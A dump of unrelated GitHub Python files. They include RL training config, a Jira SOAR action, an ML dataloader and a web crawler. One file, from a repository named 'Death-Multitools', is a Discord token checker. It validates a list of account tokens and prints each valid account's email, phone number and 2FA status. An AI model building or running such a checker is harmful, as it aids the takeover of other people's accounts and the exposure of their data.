postprocessed_batch: SampleBatch, original_batches, **kwargs) -> None:\n \n actions = postprocessed_batch[SampleBatch.ACTIONS].tolist()\n episode.hist_data['actions'] = actions\n counter = Counter(actions)\n\n for i, name in enumerate(FarmingEnv.actions):\n episode.custom_metrics[f'action_{name}_selected'] = counter.get(i, 0) / len(actions)\n \n chest_idx = FarmingEnv.actions.index('interact-chest')\n episode.custom_metrics['used_chest'] = 1.0 if chest_idx in actions else 0.0\n\ndef get_cli_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--stop-iters', type=int, default=10000,\n help='Number of iterations to train')\n parser.add_argument('--stop-timesteps', type=int, default=1000000,\n help='Number of timesteps to train for')\n parser.add_argument('--stop-reward', type=float, default=1000,\n help='Reward threshold for stopping')\n parser.add_argument('--num-cpus', type=int, default=0,\n help='Number of CPUs to use')\n parser.add_argument('--local-mode', action='store_true',\n help='Start ray in local mode')\n\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n GAMMA = 0.99\n args = get_cli_args()\n\n def env_creator(config):\n env = FarmingEnv(config)\n env = ParametricDictFlattenWrapper(env)\n # env = TimeLimit(env, max_episode_steps=4000)\n # env = NormalizeReward(env, gamma=GAMMA)\n # env = RecordVideo(env, 'videos', episode_trigger=lambda x: x % 1000)\n\n return env\n\n ray.init(num_cpus=args.num_cpus or None, num_gpus=1, local_mode=args.local_mode)\n tune.register_env('FarmingEnv', env_creator)\n\n chest_reward = 1\n harvest_reward = (1 - GAMMA) * chest_reward\n\n config = (\n APPOConfig()\n .framework('torch')\n .environment('FarmingEnv', env_config={\n 
'gamma': GAMMA,\n 'wheat_age': 7,\n 'timestep_reward': 0,\n 'fuel': 240,\n 'max_timesteps': 240,\n\n 'harvest_reward': harvest_reward,\n 'field_pbrs_type': 'r', # [1/r, gaussian, r]\n 'field_pbrs_strength': 0,\n 'field_pbrs_scale': 1,\n\n 'chest_reward': chest_reward + 0.1,\n 'chest_dist_penalty': 0,\n 'scale_chest_reward': 0,\n 'chest_pbrs_type': 'r', # [1/r, gaussian, r]\n 'chest_pbrs_strength': 0,\n 'chest_pbrs_scale': 1,\n })\n .exploration(exploration_config={\n 'type': 'EpsilonGreedy',\n 'epsilon_timesteps': 100000\n })\n .training(\n gamma=GAMMA,\n lr=1e-3,\n kl_coeff=0.1,\n clip_param=0.2,\n model={\n # 'custom_model': LSTMModel,\n # 'fcnet_hiddens': [256, 256],\n # 'fcnet_activation': 'tanh',\n # 'lstm_cell_size': 64\n\n 'custom_model': AttnModel,\n 'fcnet_hiddens': [64],\n 'fcnet_activation': 'tanh',\n 'max_seq_len': 50,\n 'attention_use_n_prev_rewards': 50,\n 'attention_use_n_prev_actions': 50,\n 'attention_num_transformer_units': 5,\n 'attention_memory_training': 50,\n 'attention_memory_inference': 50,\n 'attention_num_heads': 6,\n 'attention_head_dim': 64\n },\n train_batch_size=2000\n )\n .resources(num_gpus=int(os.environ.get(\"RLLIB_NUM_GPUS\", \"0\")))\n .rollouts(num_rollout_workers=args.num_cpus - 1)\n .callbacks(Metrics)\n )\n\n stop = {\n # \"training_iteration\": args.stop_iters,\n \"timesteps_total\": args.stop_timesteps,\n \"custom_metrics/used_chest_mean\": 0.8,\n }\n\n tuner = tune.Tuner(\n 'APPO',\n param_space=config.to_dict(),\n run_config=air.RunConfig(\n stop=stop,\n checkpoint_config=air.CheckpointConfig(\n num_to_keep=2\n )\n ),\n )\n tuner.fit()\n\n ray.shutdown()\n\n# Todo: when we copy this for hierarchal RL, rename 'prbs' to 'pbrs', and\n# update the custom metrics since each obs is now a dict with new keys, and the\n# infos are also dicts of dicts","repo_name":"jfurches/wheatbot","sub_path":"examples/farming_ppo.py","file_name":"farming_ppo.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7814813449","text":"import json\n\nfrom TIPCommon import extract_configuration_param, extract_action_param\n\nfrom JiraConstants import INTEGRATION_IDENTIFIER, LIST_ISSUES_SCRIPT_NAME, DEFAULT_DATE_FORMAT\nfrom JiraManager import JiraManager\nfrom ScriptResult import EXECUTION_STATE_COMPLETED, EXECUTION_STATE_FAILED\nfrom SiemplifyAction import SiemplifyAction\nfrom SiemplifyUtils import output_handler\nfrom utils import load_csv_to_list\n\nSPLIT_CHAR = \",\"\n\n\n@output_handler\ndef main():\n siemplify = SiemplifyAction()\n siemplify.script_name = LIST_ISSUES_SCRIPT_NAME\n siemplify.LOGGER.info(\"----------------- Main - Param Init -----------------\")\n\n # Integration Configuration\n api_root = extract_configuration_param(siemplify, provider_name=INTEGRATION_IDENTIFIER, param_name='Api Root', is_mandatory=True,\n print_value=True)\n username = extract_configuration_param(siemplify, provider_name=INTEGRATION_IDENTIFIER, param_name='Username', is_mandatory=True,\n print_value=True)\n api_token = extract_configuration_param(siemplify, provider_name=INTEGRATION_IDENTIFIER, param_name='Api Token', is_mandatory=True,\n print_value=False)\n verify_ssl = extract_configuration_param(siemplify, provider_name=INTEGRATION_IDENTIFIER, param_name='Verify SSL',\n default_value=False, input_type=bool)\n # Action parameters\n summary = extract_action_param(siemplify, param_name=\"Summary\", is_mandatory=False, print_value=True)\n description = extract_action_param(siemplify, 
param_name=\"Description\", is_mandatory=False, print_value=True)\n reporter = extract_action_param(siemplify, param_name=\"Reporter\", is_mandatory=False, print_value=True)\n updated_from = extract_action_param(siemplify, param_name=\"Updated From\", default_value=DEFAULT_DATE_FORMAT, is_mandatory=False,\n print_value=True)\n created_from = extract_action_param(siemplify, param_name=\"Created From\", default_value=DEFAULT_DATE_FORMAT, is_mandatory=False,\n print_value=True)\n project_names = extract_action_param(siemplify, param_name=\"Project Names\", is_mandatory=False, print_value=True)\n issue_types = extract_action_param(siemplify, param_name=\"Issue Types\", is_mandatory=False, print_value=True)\n priorities = extract_action_param(siemplify, param_name=\"Priorities\", is_mandatory=False, print_value=True)\n assignees = extract_action_param(siemplify, param_name=\"Assignees\", is_mandatory=False, print_value=True)\n statuses = extract_action_param(siemplify, param_name=\"Statuses\", is_mandatory=False, print_value=True)\n\n siemplify.LOGGER.info(\"----------------- Main - Started -----------------\")\n status = EXECUTION_STATE_COMPLETED\n\n try:\n jira = JiraManager(api_root, username, api_token, verify_ssl=verify_ssl, logger=siemplify.LOGGER)\n\n project_names_list = load_csv_to_list(project_names, \"Project Names\") if project_names else None\n issue_types_list = load_csv_to_list(issue_types, \"Issue Types\") if issue_types else None\n priority_list = load_csv_to_list(priorities, \"Priorities\") if priorities else None\n assignee_list = load_csv_to_list(assignees, \"Assignees\") if assignees else None\n status_list = load_csv_to_list(statuses, \"Statuses\") if statuses else None\n\n siemplify.LOGGER.info(f\"Fetching issues with provided filter parameters\")\n issues_keys = jira.list_issues(project_key_list=project_names_list,\n assignee_list=assignee_list,\n issue_type_list=issue_types_list,\n priority_list=priority_list,\n status_list=status_list,\n summary=summary,\n description=description,\n reporter=reporter,\n created_from=created_from if created_from != DEFAULT_DATE_FORMAT else None,\n updated_from=updated_from if updated_from != DEFAULT_DATE_FORMAT else None)\n\n siemplify.LOGGER.info(f\"Successfully fetched {len(issues_keys)} issues\")\n\n if issues_keys:\n output_message = f\"Found {len(issues_keys)} issues: {', '.join(issues_keys)}.\"\n result_value = json.dumps(issues_keys)\n siemplify.result.add_result_json(json.dumps(issues_keys))\n else:\n output_message = \"No issues were found for the provided filter parameters.\"\n result_value = False\n\n except Exception as error:\n output_message = \"Failed to list issues. 
Error is: {}\".format(error)\n result_value = False\n status = EXECUTION_STATE_FAILED\n siemplify.LOGGER.error(output_message)\n siemplify.LOGGER.exception(error)\n\n siemplify.LOGGER.info('----------------- Main - Finished -----------------')\n siemplify.LOGGER.info(f\"Status: {status}\")\n siemplify.LOGGER.info(f\"Result Value: {result_value}\")\n siemplify.LOGGER.info(f\"Output Message: {output_message}\")\n siemplify.end(output_message, result_value, status)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chronicle/tip-marketplace","sub_path":"Integrations/Jira/ActionsScripts/ListIssues.py","file_name":"ListIssues.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"1629494790","text":"import requests\r\nimport pystyle\r\nfrom pystyle import *\r\nimport platform\r\nimport sys\r\nimport time\r\nimport datetime\r\nSystem.Clear()\r\nascii = '''\r\n\r\n██████╗░███████╗░█████╗░████████╗██╗░░██╗\r\n██╔══██╗██╔════╝██╔══██╗╚══██╔══╝██║░░██║\r\n██║░░██║█████╗░░███████║░░░██║░░░███████║\r\n██║░░██║██╔══╝░░██╔══██║░░░██║░░░██╔══██║\r\n██████╔╝███████╗██║░░██║░░░██║░░░██║░░██║\r\n╚═════╝░╚══════╝╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝'''[1:]\r\n\r\nprint(Colorate.Horizontal(Colors.blue_to_cyan, Center.XCenter(ascii)))\r\n\r\ndef set_terminal_title(title):\r\n if platform.system() == 'Windows':\r\n sys.stdout.write(\"\\033]0;{}\\007\".format(title))\r\n else:\r\n sys.stdout.write(\"\\033]2;{}\\007\".format(title))\r\n sys.stdout.flush()\r\n\r\nfriends_count = ''\r\n\r\ndef tokenInfo(token):\r\n headr1 = {\r\n 'Authorization': f'{token}',\r\n 'Content-Type': 'application/json'\r\n }\r\n res = requests.get('https://discordapp.com/api/v6/users/@me', headers=headr1)\r\n if res.status_code == 200:\r\n print(f\"Valid Token[collecting data...]\")\r\n pass\r\n else:\r\n print(f\"Invalid Token!\")\r\n\r\n res_json = res.json()\r\n user = f'{res_json[\"username\"]}#{res_json[\"discriminator\"]}'\r\n uid = res_json['id']\r\n user_id = uid\r\n avatar_id = res_json['avatar']\r\n avatar_url = f'https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}.gif'\r\n pnum = res_json['phone']\r\n email = res_json['email']\r\n mfa_enabled = res_json['mfa_enabled']\r\n flags = res_json['flags']\r\n lang = res_json['locale']\r\n verified = res_json['verified']\r\n has_nitro = False\r\n res = requests.get('https://discordapp.com/api/v6/users/@me/billing/subscriptions', headers=headr1)\r\n nitro_data = res.json()\r\n has_nitro = bool(len(nitro_data) > 0)\r\n\r\n print( f\"\"\"\\n\r\n Token: {token}\r\nUsername: {user}\r\nUser-ID: {uid}\r\nAvatar-ID: {avatar_id}\r\nAvatar-URL: {avatar_url}\r\nPhone-Number: {pnum}\r\nEmail: {email}\r\n2FA: {mfa_enabled}\r\nFlags: {flags}\r\nLanguage: {lang}\r\nVerified: {verified}\r\nNitro: {has_nitro}\r\n\"\"\")\r\nwith open(\"tokens.txt\", \"r\") as file:\r\n tokens = [line.replace('\\n', '') for line in file.readlines() if line != '\\n']\r\n valid_tokens = []\r\n invalid_tokens = []\r\n for token in tokens:\r\n r1 = requests.get('https://discord.com/api/v6/auth/login', headers={\"Authorization\": token})\r\n if r1.status_code <= 299:\r\n print(Colorate.Horizontal(Colors.blue_to_cyan, f\"Valid token | {token}\"))\r\n print(Colorate.Horizontal(Colors.blue_to_cyan,'------------------------------------------------------------------------------------------------------------'))\r\n set_terminal_title(\"Valid tokens = {} Invalid tokens = {}\".format(len(valid_tokens), len(invalid_tokens)))\r\n 
valid_tokens.append(token)\r\n else:\r\n print(Colorate.Horizontal(Colors.blue_to_white, f\"Invalid token | {token}\"))\r\n print(Colorate.Horizontal(Colors.blue_to_cyan,'------------------------------------------------------------------------------------------------------------'))\r\n set_terminal_title(\"Valid tokens = {} Invalid tokens = {}\".format(len(valid_tokens), len(invalid_tokens)))\r\n invalid_tokens.append(token)\r\n\r\nwith open(\"valid_tokens.txt\", \"w\") as valid_file:\r\n for token in valid_tokens:\r\n valid_file.write(token + \"\\n\")\r\n\r\nwith open(\"invalid_tokens.txt\", \"w\") as invalid_file:\r\n for token in invalid_tokens:\r\n invalid_file.write(token + \"\\n\")\r\n\r\n\r\nchoice = input(Colorate.Horizontal(Colors.blue_to_cyan,'Do you want tokens informations ? Yes [1] / No [2]'))\r\nif choice == '1':\r\n\r\n with open(\"valid_tokens.txt\", \"r\") as file:\r\n tokens = [line.replace('\\n', '') for line in file.readlines() if line != '\\n']\r\n for token in tokens:\r\n tokenInfo(token)\r\n\r\nelse:\r\n print('')\r\n\r\n\r\ninput(Colorate.Horizontal(Colors.blue_to_cyan, 'Working token saved in valid_tokens.txt \\n\\nInvalid token are saved in invalid_token \\n\\nPress any key to leave'))\r\nSystem.Clear()\r\n","repo_name":"TheCuteOwl/Death-Multitools","sub_path":"Utils/TokenChecker.py","file_name":"TokenChecker.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"71744586291","text":"import os\nos.chdir(\"../../\")\nfrom evaluator import Evaluator\n\n\nif __name__ == \"__main__\":\n configs = []\n for property in [\"phc\",\"phh\",\"ec\",\"caco3\",\"p\",\"n\",\"k\"]:\n configs.append({\"x\":[property], \"y\":\"oc\", \"machine\":\"ann\"})\n\n ev = Evaluator(\n cofigs=configs,\n repeat=1,\n folds=10,\n prefix=\"all_ann_single\"\n )\n ev.process()\n print(\"Done all\")","repo_name":"arf-themascoteers/visnir","sub_path":"cases/archived/all_ann_single.py","file_name":"all_ann_single.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"71013595889","text":"string = input()\narr = [0] * 100\nfor s in string:\n arr[ord(s)] += 1\nN = sum(arr)\nflag = []\nfor i in range(100):\n if arr[i] % 2:\n flag.append([i,arr[i]])\nif (N%2 and len(flag) != 1) or (not N%2 and len(flag) > 0):\n print('I\\'m Sorry Hansoo')\nelse:\n ans = ''\n for i in range(100):\n if arr[i]:\n temp = arr[i]//2\n arr[i] -= temp\n ans += chr(i)*temp\n\n if flag:\n ans += chr(flag[0][0])\n arr[flag[0][0]] -= 1\n\n for i in range(99,-1,-1):\n if arr[i]:\n ans += chr(i)*arr[i]\n print(ans)","repo_name":"hw2ny1/STUDY","sub_path":"Boj/Silver/1213 펠린���롬 만들기.py","file_name":"1213 펠린드롬 만들기.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26661384026","text":"# Multi-word nouns are in a different file so we can\n# read the entire line\ndef get_multi_nouns():\n\twith open(\"gram-mult-noun\", \"w\") as output:\n\t\twith open(\"mult-noun-def\",\"r\") as input:\n\t\t\tfor line in input:\n\t\t\t\toutput.write(\" | \" + line.rstrip())\n\t\tinput.closed\n\toutput.closed\n\n# Get all of the words labels with [label] for easy \n# exporting to the grammar\ndef get_labels(label):\n\twith open(\"gram-out\", \"w\") as output:\n\t\twith open(\"gram-def\",\"r\") as input:\n\t\t\tfor line in input:\n\t\t\t\ttokens = 
line.split()\n\t\t\t\tif tokens[1].upper() == label:\n\t\t\t\t\toutput.write(\" | \" + tokens[0])\n\t\tinput.closed\n\toutput.closed\n\nget_labels(\"NOUN\")\nget_multi_nouns()","repo_name":"tranac/cs544-group-project","sub_path":"eval/generate_grammar.py","file_name":"generate_grammar.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"70578874610","text":"import numpy as np\nimport torch\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.dataloader import default_collate\nfrom torch.utils.data import TensorDataset\nimport more_itertools as miter\n\nclass TAMKOT_DataLoader:\n def __init__(self, config, data):\n self.batch_size = config[\"batch_size\"]\n self.shuffle = config[\"shuffle\"]\n self.collate_fn = default_collate\n self.metric = config[\"metric\"]\n\n self.seed = config['seed']\n\n self.validation_split = config[\"validation_split\"]\n self.mode = config[\"mode\"]\n\n self.min_seq_len = config[\"min_seq_len\"] if \"min_seq_len\" in config else None\n self.max_seq_len = config[\"max_seq_len\"] if \"max_seq_len\" in config else None\n self.stride = config[\"max_seq_len\"] if \"max_seq_len\" in config else None\n\n self.init_kwargs = {\n 'batch_size': self.batch_size,\n 'shuffle': self.shuffle,\n 'collate_fn': self.collate_fn,\n }\n\n self.generate_train_test_data(data)\n\n # define the data format for different perfromance data\n if self.metric == 'rmse':\n self.train_data = TensorDataset(torch.Tensor(self.train_data_q).long(),\n torch.Tensor(self.train_data_a).float(),\n torch.Tensor(self.train_data_l).long(),\n torch.Tensor(self.train_data_d).long(),\n torch.Tensor(self.train_target_answers).float(),\n torch.Tensor(self.train_target_masks).bool(),\n torch.Tensor(self.train_target_masks_l).bool())\n\n self.test_data = TensorDataset(torch.Tensor(self.test_data_q).long(), torch.Tensor(self.test_data_a).float(),\n torch.Tensor(self.test_data_l).long(), torch.Tensor(self.test_data_d).long(),\n torch.Tensor(self.test_target_answers).float(),\n torch.Tensor(self.test_target_masks).bool(),\n torch.Tensor(self.test_target_masks_l).bool())\n\n else:\n self.train_data = TensorDataset(torch.Tensor(self.train_data_q).long(),\n torch.Tensor(self.train_data_a).long(),\n torch.Tensor(self.train_data_l).long(),\n torch.Tensor(self.train_data_d).long(),\n torch.Tensor(self.train_target_answers).long(),\n torch.Tensor(self.train_target_masks).bool(),\n torch.Tensor(self.train_target_masks_l).bool())\n\n\n self.test_data = TensorDataset(torch.Tensor(self.test_data_q).long(), torch.Tensor(self.test_data_a).long(),\n torch.Tensor(self.test_data_l).long(), torch.Tensor(self.test_data_d).long(),\n torch.Tensor(self.test_target_answers).long(),\n torch.Tensor(self.test_target_masks).bool(),\n torch.Tensor(self.test_target_masks_l).bool())\n\n # create batched data\n self.train_loader = DataLoader(self.train_data, batch_size=self.batch_size)\n\n self.test_loader = DataLoader(self.test_data, batch_size=self.test_data_a.shape[0])\n\n\n def generate_train_test_data(self, data):\n \"\"\"\n read or process data for training and testing\n \"\"\"\n\n q_records = data[\"traindata\"][\"q_data\"]\n a_records = data[\"traindata\"][\"a_data\"]\n l_records = data[\"traindata\"][\"l_data\"]\n d_records = data[\"traindata\"][\"d_data\"]\n\n self.train_data_q, self.train_data_a, self.train_data_l, self.train_data_d = self.TAMKOT_ExtDataset(q_records,\n 
a_records,\n l_records,\n d_records,\n self.max_seq_len,\n stride=self.stride)\n\n self.train_target_answers = np.copy(self.train_data_a)\n self.train_target_masks = (self.train_data_q != 0)\n self.train_target_masks_l = (self.train_data_l != 0)\n\n if self.mode == \"train\":\n # n_samples = len(self.train_data_q)\n # split the train data into train and val sets based on the self.n_samples\n\n self.train_data_q, self.test_data_q, self.train_data_a, self.test_data_a, self.train_data_l, \\\n self.test_data_l, self.train_data_d, \\\n self.test_data_d, self.train_target_answers, self.test_target_answers, \\\n self.train_target_masks, self.test_target_masks, self.train_target_masks_l, self.test_target_masks_l = train_test_split(\n self.train_data_q, self.train_data_a, self.train_data_l, self.train_data_d, self.train_target_answers,\n self.train_target_masks, self.train_target_masks_l)\n\n\n elif self.mode == 'test':\n q_records = data[\"testdata\"][\"q_data\"]\n a_records = data[\"testdata\"][\"a_data\"]\n l_records = data[\"testdata\"][\"l_data\"]\n d_records = data[\"testdata\"][\"d_data\"]\n\n\n self.test_data_q, self.test_data_a, self.test_data_l, self.test_data_d = self.TAMKOT_ExtDataset(q_records,\n a_records,\n l_records,\n d_records,\n self.max_seq_len,\n stride=self.stride)\n\n self.test_target_answers = np.copy(self.test_data_a)\n self.test_target_masks = (self.test_data_q != 0)\n self.test_target_masks_l = (self.test_data_l != 0)\n\n\n\n def TAMKOT_ExtDataset(self, q_records, a_records, l_records, d_records,\n max_seq_len,\n stride):\n \"\"\"\n transform the data into feasible input of model,\n truncate the seq. if it is too long and\n pad the seq. with 0s if it is too short\n \"\"\"\n\n q_data = []\n a_data = []\n l_data = []\n d_data = []\n for index in range(len(q_records)):\n q_list = q_records[index]\n a_list = a_records[index]\n l_list = l_records[index]\n d_list = d_records[index]\n\n # if seq length is less than max_seq_len, the windowed will pad it with fillvalue\n # the reason for inserting two padding attempts with 0 and setting stride = stride - 2 is to make sure the\n # first activity of each sequence is included in training and testing, and also for each sequence's first\n # activity there is an activity zero to be t - 1 attempt.\n\n q_list.insert(0, 0)\n a_list.insert(0, 2)\n l_list.insert(0, 0)\n d_list.insert(0, 0)\n\n q_list.insert(0, 0)\n a_list.insert(0, 2)\n l_list.insert(0, 0)\n d_list.insert(0, 0)\n q_patches = list(miter.windowed(q_list, max_seq_len, fillvalue=0, step=stride-2))\n a_patches = list(miter.windowed(a_list, max_seq_len, fillvalue=2, step=stride-2))\n l_patches = list(miter.windowed(l_list, max_seq_len, fillvalue=0, step=stride-2))\n d_patches = list(miter.windowed(d_list, max_seq_len, fillvalue=0, step=stride-2))\n\n q_data.extend(q_patches)\n a_data.extend(a_patches)\n l_data.extend(l_patches)\n d_data.extend(d_patches)\n\n return np.array(q_data), np.array(a_data), np.array(l_data), np.array(d_data)\n\n\n\n","repo_name":"persai-lab/BigData2022-TAMKOT","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"5092904672","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/29 17:19\n# @Author : jimmy\n# @File : UserProfileWordLibrary.py\n# @Software: PyCharm\nimport threading\nimport os\nimport jieba\nimport jieba.posseg as pesg\n\n# 用户画像词库\nclass UserprofileWordLibrary(object):\n 
_instance_lock = threading.Lock()\r\n\r\n    def __init__(self, wordLibrary_path_list):\r\n        self.wordLibrary_path_list = wordLibrary_path_list\r\n        # load the stop words\r\n        self.stop_words = self.readDataFromTxtFile(inputPath=self.wordLibrary_path_list[0], dataType='set')\r\n        # load the word libraries\r\n        self.word_library = {}\r\n        for index in range(1, len(wordLibrary_path_list)):\r\n            word_library_name = os.path.basename(wordLibrary_path_list[index]).replace('.txt', '')\r\n            word_library_value = self.readDataFromTxtFile(inputPath=self.wordLibrary_path_list[index], dataType='set')\r\n            if word_library_value != -1:\r\n                self.word_library[word_library_name] = word_library_value\r\n                jieba.load_userdict(wordLibrary_path_list[index])\r\n        self.pesg = pesg\r\n\r\n    @classmethod\r\n    def instance(cls, *args, **kwargs):\r\n        if not hasattr(UserprofileWordLibrary, \"_instance\"):\r\n            with UserprofileWordLibrary._instance_lock:\r\n                if not hasattr(UserprofileWordLibrary, \"_instance\"):\r\n                    UserprofileWordLibrary._instance = UserprofileWordLibrary(*args, **kwargs)\r\n        return UserprofileWordLibrary._instance\r\n\r\n    # read the contents of a txt file; returns -1 on failure\r\n    def readDataFromTxtFile(self, inputPath, dataType='List'):\r\n        try:\r\n            with open(inputPath, 'r', encoding='utf-8') as f:\r\n                text = f.read()\r\n            textList = text.split('\\n')\r\n            textList = list(filter(None, textList))\r\n            if dataType.lower() == 'list':\r\n                return textList\r\n            elif dataType.lower() == 'set':\r\n                return set(textList)\r\n            else:\r\n                return -1\r\n        except Exception:\r\n            return -1","repo_name":"JimmyLong/python-getkeyword-demo","sub_path":"DataScienceServer_GetKeyWords/UserProfileWordLibrary.py","file_name":"UserProfileWordLibrary.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"21802985789","text":"\"\"\"\r\nThis is a webCrawler designed for extracting urls. It will filter the desired urls to prevent\r\nduplicated crawls in the future. 
Final urls will be saved in txt file.\r\n\"\"\"\r\n\r\nimport bs4 as bs\r\nimport urllib.request\r\nimport urllib.error\r\nimport re\r\nimport codecs\r\nimport time\r\nimport socket\r\nimport threading\r\nimport queue as Queue\r\nimport urllib3\r\n\r\n\r\n\r\ndef html_to_bs(start_url):\r\n \"\"\"\r\n Convert website html to Beautiful Soup.\r\n :param start_url: start url for crawling\r\n :return beautiful soup object\r\n \"\"\"\r\n sauce = urllib.request.urlopen(start_url).read()\r\n soup = bs.BeautifulSoup(sauce, 'lxml')\r\n return soup\r\n\r\n\r\ndef url_finder(soup, start_url, module_pattern, exist_url):\r\n \"\"\"\r\n Find all the url links from start url.\r\n :param soup: bs by start url\r\n start_url: start url for crawling\r\n module_pattern: the url pattern of assigned module\r\n :return: spider_lst : a list contains all urls in website\r\n \"\"\"\r\n spider_list = [] + exist_url\r\n # spider_list.append(start_url)\r\n\r\n http_scan = re.compile('http')\r\n module_scan = re.compile(module_pattern)\r\n # http_full_html = \"https://www.cnn.com\"\r\n http_full_html = \"https://www.dailymail.co.uk\"\r\n\r\n tmp_url_list = soup.find_all('a')\r\n for link in tmp_url_list:\r\n new_url = link.get('href')\r\n full_url_flag = re.findall(http_scan, str(new_url))\r\n module_url_flag = re.findall(module_scan, str(new_url))\r\n\r\n # check url module\r\n if len(module_url_flag) > 0:\r\n # Adding url with full format to list\r\n if len(full_url_flag) > 0:\r\n if new_url not in spider_list:\r\n spider_list.append(new_url)\r\n # Complementing url lacking http format\r\n else:\r\n new_url = http_full_html + str(new_url)\r\n if new_url not in spider_list:\r\n spider_list.append(new_url)\r\n else:\r\n pass\r\n\r\n return spider_list\r\n\r\n\r\ndef url_fill(spider_list, max_url_num, module_pattern):\r\n \"\"\"\r\n Fill url list base on current urls.\r\n :param spider_list: urls obtained from start url\r\n :return: scape_list which contain max number url\r\n \"\"\"\r\n scrape_list = [] + spider_list\r\n\r\n for url in spider_list:\r\n crawler_url = url\r\n\r\n try:\r\n timeout = 20\r\n socket.setdefaulttimeout(timeout)\r\n sleep_download_time = 10\r\n time.sleep(sleep_download_time)\r\n\r\n sauce = urllib.request.urlopen(crawler_url).read()\r\n soup = bs.BeautifulSoup(sauce, 'lxml')\r\n except (urllib.error.URLError, urllib.error.HTTPError, socket.timeout, AttributeError):\r\n print(\"Soup convert failed from: \", url)\r\n continue\r\n\r\n try:\r\n new_url_list = url_finder(soup, crawler_url, module_pattern, scrape_list)\r\n except Exception as e:\r\n print(\"Url find fail: \" + url)\r\n print(str(e))\r\n\r\n scrape_list = new_url_list + scrape_list\r\n spider_list += new_url_list\r\n\r\n print(len(scrape_list))\r\n if len(scrape_list) >= max_url_num:\r\n break\r\n\r\n return scrape_list\r\n\r\n\r\ndef url_save(scrape_list, save_path):\r\n file = codecs.open(save_path, 'a')\r\n for url in scrape_list:\r\n file.write(str(url) + \"\\n\")\r\n\r\n\r\ndef url_filter(url, lock, save_file_path):\r\n\r\n try:\r\n print(url)\r\n timeout = 50\r\n socket.setdefaulttimeout(timeout)\r\n sleep_download_time = 10\r\n time.sleep(sleep_download_time)\r\n\r\n # context = ssl._create_unverified_context()\r\n request = urllib.request.urlopen(url)\r\n sauce = request.read()\r\n request.close()\r\n except (urllib.error.URLError, urllib.error.HTTPError, socket.timeout) as e:\r\n print('URL Error!', url)\r\n print(e)\r\n return\r\n\r\n soup = bs.BeautifulSoup(sauce, 'lxml')\r\n\r\n # check highlight\r\n highlight = 
soup.select('.el__storyhighlights__item')\r\n if len(highlight) == 0: # there is no highlight in website\r\n return\r\n\r\n # check video\r\n video = soup.select('.el__video')\r\n if len(video) == 0: # there is no video in website\r\n return\r\n\r\n lock.acquire()\r\n save_file = codecs.open(save_file_path, 'a')\r\n save_file.write(str(url) + \"\\n\")\r\n save_file.close()\r\n lock.release()\r\n\r\n# def url_lead(url_file_path):\r\n# \"\"\"\r\n# read in url list, which is already crawled\r\n# :param url_file_path:\r\n# :return:\r\n# \"\"\"\r\n# file = codecs.open(url_file_path).read().split(\"\\n\")\r\n# scrape_list = []\r\n# for url in file:\r\n# scrape_list.append(url)\r\n# return scrape_list\r\n\r\ndef assign_filter(url_queue, lock, save_path):\r\n \"\"\"\r\n assign filter task for every thread\r\n :param url_queue: a queue contains all urls\r\n :param lock: lock in thread for using one global variation\r\n :param save_path: save scrapping contents\r\n :return:\r\n \"\"\"\r\n # save_file = codecs.open(save_path, 'a', encoding='utf-8')\r\n while not exitFlag:\r\n if not url_queue.empty():\r\n url = url_queue.get()\r\n url_filter(url, lock, save_path)\r\n\r\n\r\ndef make_threads(thread_num, url_queue, save_path):\r\n \"\"\"\r\n makeup threads and scrape contents from assigned url\r\n :param thread_num: threads number\r\n \"\"\"\r\n print(\"makeup threads\")\r\n lock = threading.Lock()\r\n for i in range(thread_num):\r\n print(\"start thread\", i)\r\n thread = threading.Thread(target=assign_filter, args=(url_queue, lock, save_path))\r\n thread.start()\r\n\r\n\r\ndef remove_duplicate_urls(file_path, existing_file_path, filter_file_path):\r\n file = codecs.open(file_path).read().split(\"\\n\")\r\n urls = []\r\n for url in file:\r\n urls.append(url)\r\n\r\n file1 = codecs.open(existing_file_path).read().split(\"\\n\")\r\n exist_urls = []\r\n for url in file1:\r\n exist_urls.append(url)\r\n\r\n urls_filter = set(urls)\r\n urls_exist = set(exist_urls)\r\n final_urls = list(urls_filter - urls_exist)\r\n\r\n filter_file = codecs.open(filter_file_path, 'a', encoding='utf-8')\r\n for url in final_urls:\r\n filter_file.write(url+\"\\n\")\r\n\r\n\r\ndef url_lead(url_file_path):\r\n \"\"\"\r\n read in url list, which is already crawled\r\n :param url_file_path:\r\n :return:\r\n \"\"\"\r\n file = codecs.open(url_file_path).read().split(\"\\n\")\r\n url_queue = Queue.Queue(len(file))\r\n for url in file:\r\n url_queue.put(url)\r\n return url_queue\r\n\r\n\r\ndef main():\r\n max_url_num = 100\r\n start_url = \"https://www.dailymail.co.uk/news/headlines/index.html?previousday=1\"\r\n module_pattern = \"news/article\"\r\n save_path = r\"daily_mail.txt\"\r\n\r\n print(\"convert start url!\")\r\n soup = html_to_bs(start_url)\r\n print(\"crawl start url!\")\r\n spider_list = url_finder(soup, start_url, module_pattern, [])\r\n # print(\"fill url 